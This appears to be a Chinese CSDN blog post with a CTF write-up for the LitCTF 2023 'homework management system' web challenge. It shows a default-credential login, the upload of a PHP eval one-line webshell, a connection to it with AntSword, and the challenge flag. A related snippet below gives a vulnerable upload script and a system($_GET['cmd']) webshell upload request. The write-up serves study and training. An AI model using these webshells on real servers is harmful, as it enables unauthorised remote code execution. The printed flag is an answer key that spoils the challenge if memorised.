【CTF Web】NSSCTF 3867 [LitCTF 2023]作业管理系统 Writeup(文件上传+代码审计+弱口令)

最新推荐文章于 2024-06-13 09:01:52 发布
最新推荐文章于 2024-06-13 09:01:52 发布
阅读量270 收藏 3
点赞数 7
分类专栏: CTF Writeup 文章标签: web安全 前端 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34988204/article/details/137983164
版权

[LitCTF 2023]作业管理系统

交作业!!但是哪里不对?
出题人 探姬

解法

查看网页源代码。

使用默认账户登入系统。

这里可以上传文件。

上传一个一句话木马。

<?php @eval($_POST['cmd']); ?>

上传成功。

使用蚁剑连接。

在文件管理找到 flag。

Flag

NSSCTF{e10c4ecc-4ba6-4efd-95a7-75a21d21950b}

声明

本博客上发布的所有关于网络攻防技术的文章,仅用于教育和研究目的。所有涉及到的实验操作都在虚拟机或者专门设计的靶机上进行,并且严格遵守了相关法律法规

博主坚决反对任何形式的非法黑客行为,包括但不限于未经授权的访问、攻击或破坏他人的计算机系统。博主强烈建议每位读者在学习网络攻防技术时,必须遵守法律法规不得用于任何非法目的。对于因使用这些技术而导致的任何后果,博主不承担任何责任

HEX9CF
关注
  • 7
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[LitCTF 2023]作业管理系统 - 文件+口令
oZuoShen123的博客
10-09 222
1、F12看到页面源代码有注释:默认账户admin admin   使用:admin-admin 可直接登录 2、上一句话木马
ctf+web安全+任意文件+任意文件下载
10-08
ctf+web安全+任意文件+任意文件下载
CTF WebNSSCTF 3871 [LitCTF 2023]1zjs Writeup(JS分析+信息收集+代码审计+JSFuck)
HEX9CF的技术博客
05-17 818
js…?不确定,再看看。Flag形式 NSSCTF{}出题人 J_0k3r。
CTF WebNSSCTF 3873 [LitCTF 2023]Ping Writeup(RCE+Linux命令+前端绕过)
HEX9CF的技术博客
05-21 262
看看能PING出什么Flag形式 NSSCTF{}出题人 Headlight。
CTF WebNSSCTF 3863 [LitCTF 2023]导弹迷踪 Writeup(JS分析+源码泄漏+信息收集)
HEX9CF的技术博客
05-16 523
你是一颗导弹,你需要,飞到最后!(通过6道关卡就能拿到flag哦~Flag形式 NSSCTF{}出题人 探姬。
CTF Web】XCTF GFSJ0479 disabled_button Writeup(HTML+代码审计
HEX9CF的技术博客
05-09 433
X老师今天上课讲了前端知识,然后给了大家一个不能按的按钮,小宁惊奇地发现这个按钮按不下去,到底怎么才能按下去呢?
CTF WebNSSCTF 3864 [LitCTF 2023]Follow me and hack me Writeup(vim泄漏+RCE+源码泄漏)
HEX9CF的技术博客
05-20 408
漏…漏了!Flag形式 NSSCTF{}出题人 s1rius。
CTF WebNSSCTF 3861 [LitCTF 2023]我Flag呢?Writeup(信息收集+源码泄漏+代码审计
HEX9CF的技术博客
05-16 339
奇怪,放哪里了,怎么看不见呢?(初级难度)
CTF WebNSSCTF 3869 [LitCTF 2023]Http pro max plus Writeup(HTTP协议+信息收集+请求头伪造)
HEX9CF的技术博客
05-18 177
怎么还有一层…出题人 J_0k3r。
CTF WebNSSCTF 3864 [LitCTF 2023]Follow me and hack me Writeup(HTTP协议+POST注入+信息收集)
HEX9CF的技术博客
05-18 289
跟我来~Flag形式 NSSCTF{}出题人 探姬。
CTF工具之seay源代码审计系统web).rar
09-16
此工具用于学习交流用途,切勿用于其它用途。
ctf+任意命令执行RCE+常见系统命令+web安全
10-08
ctf+RCE+常见系统命令+web安全
网络安全+CTF+源码审计+O泡易支付V1.zip
11-19
网络安全+CTF+源码审计+O泡易支付V1.zip
河南省网络安全高校战队联盟CTF训练营-web文件第一期
04-22
河南省网络安全高校战队联盟CTF训练营-web文件第一期 脚本及工具
国内外网络安全现状分析
waitaikong_的博客
06-10 447
综上所述,无论是国内还是国际层面,网络安全都是一个复杂且不断演变的领域。面对日益严峻的网络安全威胁,需要政府、企业和个人共同努力,不断提升技术防护能力,加强法律法规建设,并通过国际合作共同应对挑战。同时,加强网络安全教育和人才培养也是保障网络安全的重要环节。在未来,随着技术的不断进步和国际合作的加深,我们有理由相信网络安全状况将会得到进一步的改善。
网络安全管理组织架构复习
LongL_GuYu的博客
06-12 334
网络安全管理组织架构复习
网络安全练气篇——OWASP TOP 10
weixin_55762309的博客
06-13 527
OWASP(开放式Web应用程序安全项目)是一个开放的社区,由非营利组织 OWASP基金会支持的项目。对所有致力于改进应用程序安全的人士开放,旨在提高对应用程序安全性的认识。其最具权威的就是“10项最严重的Web 应用程序安全风险列表” ,总结并更新Web应用程序中最可能、最常见、最危险的十大漏洞,是开发、测试、服务、咨询人员应知应会的知识。最重要的版本应用程序中最严重的十大风险。
网络安全 - ARP 欺骗原理+实验
最新发布
z339521的博客
06-13 1123
APRAPR(Address Resolution Protocol)即地址解析协议,负责将某个 IP 地址解析成对应的 MAC 地址。在网络通信过程中会使用到这两种地址,逻辑 IP 地址和物理 MAC 地址,一般情况下,正常通信需要这两种地址协同工作。一个主机要和另一个主机进行直接通信,必须要知道目标主机的 MAC 地址。但这个目标 MAC 地址是如何获得的呢?就是需要通过 ARP 协议获得的。
找一道ctf web方向一道文件的题,并给出代码以及解决方法
03-05
我可以回答这个问题。这里有一道ctf web方向的文件题目的代码和解决方法: 代码: ```php <?php if(isset($_POST['submit'])){ $target_dir = "uploads/"; $target_file = $target_dir . basename($_FILES["fileToUpload"]["name"]); $uploadOk = 1; $imageFileType = strtolower(pathinfo($target_file,PATHINFO_EXTENSION)); if(isset($_POST["submit"])) { $check = getimagesize($_FILES["fileToUpload"]["tmp_name"]); if($check !== false) { echo "File is an image - " . $check["mime"] . "."; $uploadOk = 1; } else { echo "File is not an image."; $uploadOk = ; } } if (file_exists($target_file)) { echo "Sorry, file already exists."; $uploadOk = ; } if ($_FILES["fileToUpload"]["size"] > 500000) { echo "Sorry, your file is too large."; $uploadOk = ; } if($imageFileType != "jpg" && $imageFileType != "png" && $imageFileType != "jpeg" && $imageFileType != "gif" ) { echo "Sorry, only JPG, JPEG, PNG & GIF files are allowed."; $uploadOk = ; } if ($uploadOk == ) { echo "Sorry, your file was not uploaded."; } else { if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)) { echo "The file ". basename( $_FILES["fileToUpload"]["name"]). " has been uploaded."; } else { echo "Sorry, there was an error uploading your file."; } } } ?> <!DOCTYPE html> <html> <body> <form action="" method="post" enctype="multipart/form-data"> Select image to upload: <input type="file" name="fileToUpload" id="fileToUpload"> <input type="submit" value="Upload Image" name="submit"> </form> </body> </html> ``` 解决方法: 这道题目的漏洞在于没有对上文件进行类型检查,只是简单地检查了文件的后缀名。攻击者可以通过修改文件的Content-Type来绕过这个检查。因此,我们可以通过修改Content-Type来上一个包含恶意代码文件,然后执行这个文件来获取flag。 具体步骤如下: 1. 上一个包含恶意代码文件,如下所示: ``` ------WebKitFormBoundary7MA4YWxkTrZugW Content-Disposition: form-data; name="fileToUpload"; filename="shell.php" Content-Type: image/jpeg <?php echo system($_GET['cmd']); ?> ------WebKitFormBoundary7MA4YWxkTrZugW-- ``` 2. 修改Content-Type为`image/jpeg`,然后提交表单。 3. 访问上文件,执行恶意代码,如下所示: ``` http://example.com/uploads/shell.php?cmd=ls ``` 这样就可以获取flag了。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值